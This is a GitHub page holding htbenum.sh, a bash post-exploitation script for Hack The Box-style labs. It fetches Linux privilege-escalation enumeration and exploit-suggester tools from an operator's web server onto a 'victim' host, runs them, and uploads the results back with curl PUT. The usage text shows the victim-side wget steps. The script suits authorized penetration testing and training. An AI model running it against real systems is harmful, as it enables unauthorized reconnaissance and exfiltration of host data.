forked from SolomonSklash/htbenum
-
Notifications
You must be signed in to change notification settings - Fork 0
/
htbenum.sh
executable file
·362 lines (332 loc) · 13.5 KB
/
htbenum.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
#!/bin/bash
# TODO
# - make an interactive option
# - make adding/running tools modular:
# - add web server feature
# - upload reports back to host box
# Colors
NC='\033[0m'
RED='\033[0;31m'
GREEN='\033[0;32m'
BLUE='\033[0;34m'
ORANGE='\033[0;33m'
function banner () {
echo -e "${BLUE}";
echo "_ _ ___________ _____ _ _ _ ____ ___";
echo "| | | |_ _| ___ \ ___| \ | | | | | \/ |";
echo "| |_| | | | | |_/ / |__ | \| | | | | . . |";
echo "| _ | | | | ___ \ __|| . \` | | | | |\/| |";
echo "| | | | | | | |_/ / |___| |\ | |_| | | | |";
echo "\_| |_/ \_/ \____/\____/\_| \_/\___/\_| |_/";
echo -e "\n${ORANGE}By Solomon Sklash - [email protected] ${NC}\n";
}
function usage () {
echo -e "${GREEN} Usage:";
echo -e "${GREEN} ./htbenum.sh [-u] -i IP -p port [-o directory] [-w] [-r]\n";
echo -e "${GREEN} htbenum is designed do Linux enumeration in environments like Hack The Box where ";
echo -e "${GREEN} you do not have direct Internet access to download scripts and tools.\n";
echo -e "${GREEN} It will download enumeration and exploit suggestion scripts to a Linux host and ";
echo -e "${GREEN} automatically execute them, providing a saved text report for each tool, and ";
echo -e "${GREEN} optionally upload the reports back top the host machine. Simply upload htbenum.sh ";
echo -e "${GREEN} to a host, run with the IP and port of the builtin web server hosting the tools ";
echo -e "${GREEN} (or use your own), and they will be downloaded to /tmp (or an optional user-defined ";
echo -e "${GREEN} directory) and executed, with report output being saved to /tmp or a custom directory.";
echo -e "${GREEN} The reports can also optionally be uploaded back to your host machine.\n";
echo -e "${GREEN} Note: Before running this tool on the target host, make sure to run it locally with ";
echo -e "${GREEN} the update parameter in order to download all the necessary tools to the current ";
echo -e "${GREEN} directory. Then start the builtin web server to host the tools and receive the reports.\n ";
echo -e "${GREEN} Example:";
echo -e "${GREEN} Host machine: root@kali:~/htbenum# ./htbenum.sh -u";
echo -e "${GREEN} Host machine: root@kali:~/htbenum# ./htbenum.sh -i 10.10.14.1 -p 80 -w";
echo -e "${GREEN} Victim machine: www-data@victim:/tmp$ wget http://10.10.14.1:80/htbenum.sh";
echo -e "${GREEN} Victim machine: www-data@victim:/tmp$ chmod +x ./htbenum.sh";
echo -e "${GREEN} Victim machine: www-data@victim:/tmp$ ./htbenum.sh -i 10.10.14.1 -p 80 -r\n";
echo -e "${GREEN} Parameters:";
echo -e "${GREEN} -h - View help and usage.";
echo -e "${GREEN} -i IP - IP address of the listening web server used for upload and download.";
echo -e "${GREEN} -p port - TCP port of the listening web server used for upload and download.";
echo -e "${GREEN} -o directory - Custom download and report creation directory (default is /tmp).";
echo -e "${GREEN} -w - Start builtin web server for downloading files and uploading reports.";
echo -e "${GREEN} -u - Update to the latest versions of each tool, overwriting any existing versions.";
echo -e "${GREEN} -r - Upload reports back to the host machine web server (must support PUT requests).";
}
# Arguments
ARGS=$#;
IP="";
PORT="";
DIR="/tmp";
WEB="";
UPDATE="";
UPLOAD="";
# Python
PY2="";
PY3="";
while getopts ":hi:p:o:wur" opt; do
case ${opt} in
h )
banner;
usage;
exit 0;
;;
i )
IP=$OPTARG;
if [[ "$IP" == "localhost" ]]; then
IP="127.0.0.1";
fi
;;
p )
PORT=$OPTARG;
;;
o )
DIR=$OPTARG;
;;
w )
WEB=1;
;;
u )
UPDATE=1;
;;
r )
UPLOAD=1;
;;
* ) # Invalid option
echo -e "$RED""[!] Invalid Option: -$OPTARG" 1>&2;
usage;
exit 1;
;;
esac
done
shift $((OPTIND -1));
function update () {
# Get all scripts, overwrite if they already exist
echo -e "${GREEN}[i] Updating all tools...${NC}";
# Enumeration scripts
wget -nv "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -O lse.sh;
wget -nv "https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh" -O linenum.sh;
wget -nv "https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py" -O linuxprivchecker.py;
wget -nv "https://raw.githubusercontent.com/initstring/uptux/master/uptux.py" -O uptux.py;
wget -nv "https://raw.githubusercontent.com/Anon-Exploiter/SUID3NUM/master/suid3num.py" -O suid3num.py;
# Exploit suggestion scripts
wget -nv "https://raw.githubusercontent.com/belane/linux-soft-exploit-suggester/master/linux-soft-exploit-suggester.py" -O les-soft.py;
wget -nv "https://raw.githubusercontent.com/offensive-security/exploit-database/master/files_exploits.csv" -O files_exploits.csv;
wget -nv "https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh" -O les.sh;
echo -e "${GREEN}[i] Update complete!${NC}";
exit 0;
}
# Check Python versions available
function pycheck () {
PY2=$(command -v python2);
if [[ "$PY2" == "" ]]; then
echo -e "${ORANGE}[!] Python 2 was not found, not all enumeration tools may run!${NC}";
else
echo -e "${GREEN}[i] Python 2 was found!${NC}";
fi
PY3=$(command -v python3);
if [[ "$PY3" == "" ]]; then
echo -e "${ORANGE}[!] Python 3 was not found, not all enumeration tools may run and local web server is unavailable!${NC}";
else
echo -e "${GREEN}[i] Python 3 was found!${NC}";
fi
}
# Notifcation of tool starting
function start () {
NAME=$1;
echo -e "${GREEN}********************************************************************************${NC}";
echo -e "${RED}$1 is starting!${RED}";
echo -e "${GREEN}********************************************************************************${NC}";
sleep 2;
}
# Notifcation of completed tool
function complete () {
echo -e "${GREEN}********************************************************************************${NC}";
echo -e "${RED}$1 has finished running!${RED}";
echo -e "${GREEN}********************************************************************************${NC}";
sleep 2;
}
# local web server
function webserver () {
if [[ "$PY3" == "" ]]; then
echo -e "${RED}[!] Python 3 was not found, the web server cannot run. Exiting!${NC}";
exit 1;
else
"$PY3" webserver.py "$IP" "$PORT";
fi
}
# Download files
function download () {
# Download first file, check for wget success code, exit if it failed
echo -e "${GREEN}[*] Downloading enumeration scripts to /tmp!${NC}";
wget --max-redirect=0 -nv -t 2 "http://$IP:$PORT/lse.sh" -O "$DIR"/lse.sh;
RETURN=$?;
if [[ "$RETURN" -ne 0 ]]; then
echo -e "${RED}[!] Failed to download first script, bailing out!${NC}";
exit 1;
else
chmod +x "$DIR"/lse.sh;
wget --max-redirect=0 -nv -t 2 "http://$IP:$PORT/linenum.sh" -O "$DIR"/linenum.sh;
chmod +x "$DIR"/linenum.sh;
wget --max-redirect=0 -nv -t 2 "http://$IP:$PORT/linuxprivchecker.py" -O "$DIR"/linuxprivchecker.py;
chmod +x "$DIR"/linuxprivchecker.py;
wget --max-redirect=0 -nv -t 2 "http://$IP:$PORT/uptux.py" -O "$DIR"/uptux.py;
chmod +x "$DIR"/uptux.py;
wget --max-redirect=0 -nv -t 2 "http://$IP:$PORT/suid3num.py" -O "$DIR"/suid3num.py;
chmod +x "$DIR"/suid3num.py;
# exploit suggestion tools
wget --max-redirect=0 -nv -t 2 "http://$IP:$PORT/les.sh" -O "$DIR"/les.sh;
chmod +x "$DIR"/les.sh;
wget --max-redirect=0 -nv -t 2 "http://$IP:$PORT/les-soft.py" -O "$DIR"/les-soft.py;
chmod +x "$DIR"/les-soft.py;
wget --max-redirect=0 -nv -t 2 "http://$IP:$PORT/files_exploits.csv" -O "$DIR"/files_exploits.csv;
fi
}
# Run tools
function runtools () {
echo -e "${ORANGE}[?] Run [a]ll, [n]o, [e]numeration, or [s]uggestion tools?${GREEN}";
read -p "[?] a/n/e/s " answer
echo -e "${NC}";
if [[ ${answer} == "all" || ${answer} == "a" ]]; then
start "Linux Smart Enumeration";
"$DIR"/lse.sh -ci -l 0 | tee "$DIR"/lse-report.txt;
complete "Linux Smart Enumeration";
start "LinEnum";
"$DIR"/linenum.sh -r report -e "$DIR"/linenum-report -t;
complete "LinEnum";
if [[ "$PY2" == "" && "$PY3" == "" ]]; then
echo -e "${ORANGE}[!] No version of Python found, skipping linuxprivchecker!${NC}";
elif [[ "$PY2" == "" ]]; then
echo -e "${ORANGE}[!] Python 2 was not found, skipping linuxprivchecker!${NC}";
else
start "linuxprivchecker";
python "$DIR"/linuxprivchecker.py | tee "$DIR"/linuxprivchecker-report.txt;
complete "linuxprivchecker";
fi
if [[ "$PY2" == "" && "$PY3" == "" ]]; then
echo -e "${ORANGE}[!] No version of Python found, skipping Uptux!${NC}";
else
start "Uptux";
python -u "$DIR"/uptux.py -n | tee "$DIR"/uptux-report.txt;
complete "Uptux";
fi
if [[ "$PY2" == "" && "$PY3" == "" ]]; then
echo -e "${ORANGE}[!] No version of Python found, skipping Suid3num!${NC}";
else
start "Suid3num";
python "$DIR"/suid3num.py | tee "$DIR"/suid3num-report.txt;
complete "Suid3num";
fi
# Run exploit suggestion tools
start "Linux Exploit Suggester";
"$DIR"/les.sh | tee "$DIR"/les-report.txt;
complete "Linux Exploit Suggester";
if [[ "$PY2" == "" && "$PY3" == "" ]]; then
echo -e "${ORANGE}[!] No version of Python found, skipping Linux Soft Exploit Suggester!${NC}";
elif [[ "$PY2" == "" ]]; then
echo -e "${ORANGE}[!] Python 2 was not found, skipping Linux Soft Exploit Suggester!${NC}";
else
start "Linux Soft Exploit Suggester";
python -u "$DIR"/les-soft.py | tee "$DIR"/les-soft-report.txt;
complete "Linux Soft Exploit Suggester";
fi
elif [[ ${answer} == "no" || ${answer} == "n" ]]; then
echo -e "${GREEN}********************************************************************************${NC}";
echo -e "${BLUE}Script complete! See $DIR for output.${NC}";
echo -e "${GREEN}********************************************************************************${NC}";
exit 0;
elif [[ ${answer} == "enumeration" || ${answer} == "e" ]]; then
start "Linux Smart Enumeration";
"$DIR"/lse.sh -ci -l 0 | tee "$DIR"/lse-report.txt;
complete "Linux Smart Enumeration";
start "LinEnum";
"$DIR"/linenum.sh -r report -e "$DIR"/linenum-report -t;
complete "LinEnum";
if [[ "$PY2" == "" && "$PY3" == "" ]]; then
echo -e "${ORANGE}[!] No version of Python found, skipping linuxprivchecker!${NC}";
elif [[ "$PY2" == "" ]]; then
echo -e "${ORANGE}[!] Python 2 was not found, skipping linuxprivchecker!${NC}";
else
start "linuxprivchecker";
python "$DIR"/linuxprivchecker.py | tee "$DIR"/linuxprivchecker-report.txt;
complete "linuxprivchecker";
fi
if [[ "$PY2" == "" && "$PY3" == "" ]]; then
echo -e "${ORANGE}[!] No version of Python found, skipping Uptux!${NC}";
else
start "Uptux";
python "$DIR"/uptux.py -n | tee "$DIR"/uptux-report.txt;
complete "Uptux";
fi
if [[ "$PY2" == "" && "$PY3" == "" ]]; then
echo -e "${ORANGE}[!] No version of Python found, skipping Suid3num!${NC}";
else
start "Suid3num";
python "$DIR"/suid3num.py | tee "$DIR"/suid3num-report.txt;
complete "Suid3num";
fi
elif [[ ${answer} == "suggestion" || ${answer} == "s" ]]; then
start "Linux Exploit Suggester";
"$DIR"/les.sh | tee "$DIR"/les-report.txt;
complete "Linux Exploit Suggester";
if [[ "$PY2" == "" && "$PY3" == "" ]]; then
echo -e "${ORANGE}[!] No version of Python found, skipping Linux Soft Exploit Suggester!${NC}";
elif [[ "$PY2" == "" ]]; then
echo -e "${ORANGE}[!] Python 2 was not found, skipping Linux Soft Exploit Suggester!${NC}";
else
start "Linux Soft Exploit Suggester";
python -u "$DIR"/les-soft.py | tee "$DIR"/les-soft-report.txt;
complete "Linux Soft Exploit Suggester";
fi
fi
}
# Upload reports
function upload () {
REPORTS=( "lse-report.txt" "linenum-report.tar.gz" "linuxprivchecker-report.txt" "uptux-report.txt" "suid3num-report.txt" "les-report.txt" "les-soft-report.txt" )
CURL=$(command -v curl);
if [[ "$CURL" == "" ]]; then
echo -e "${ORANGE}[!] curl not found, skipping report upload!${NC}";
return;
else
echo -e "${BLUE}[*] Beginning report upload!${NC}";
# Tar up linenum-report
if [[ -e "$DIR"/linenum-report ]]; then
echo -e "${GREEN}[i] Tar-ing up linenum-report.${NC}";
tar czf "$DIR"/linenum-report.tar.gz "$DIR"/linenum-report;
fi
# Upload each report
for report in "${REPORTS[@]}"
do
if [[ -e "$DIR/$report" ]]; then
echo -e "${GREEN}[i] Uploading $report to the host server..${NC}";
curl -X PUT --upload-file "$DIR/$report" http://"$IP":"$PORT";
fi
done
fi
}
# Start main script execution
if [[ "$ARGS" -eq 0 ]]; then
banner;
usage;
exit 0;
fi
banner;
if [[ "$UPDATE" -eq 1 ]]; then
update;
fi
# Check for IP and port
if [[ "$IP" == "" || "$PORT" == "" ]]; then
echo -e "${RED}[!] IP or port not provided!${NC}";
exit 1;
fi
# Python check
pycheck;
if [[ "$WEB" -eq 1 ]]; then
webserver;
else
download;
runtools;
if [[ "$UPLOAD" -eq 1 ]]; then
upload;
fi
fi
echo -e "${GREEN}********************************************************************************${NC}";
echo -e "${BLUE}Script complete!${NC}";
echo -e "${GREEN}********************************************************************************${NC}";